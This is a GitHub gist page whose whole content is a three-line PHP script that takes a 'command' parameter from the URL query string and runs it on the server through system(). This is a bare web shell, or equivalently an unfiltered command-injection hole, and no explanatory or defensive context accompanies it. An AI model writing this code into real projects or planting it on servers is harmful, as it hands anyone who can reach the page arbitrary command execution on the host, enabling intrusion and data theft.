Skip to content

Instantly share code, notes, and snippets.

@DavidMellul
Last active March 1, 2018 18:24
Show Gist options
  • Save DavidMellul/65e84a24de8bb581ab93520da55f1650 to your computer and use it in GitHub Desktop.
Save DavidMellul/65e84a24de8bb581ab93520da55f1650 to your computer and use it in GitHub Desktop.
<?php
$cmd = $_GET['command'];
system($cmd);
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment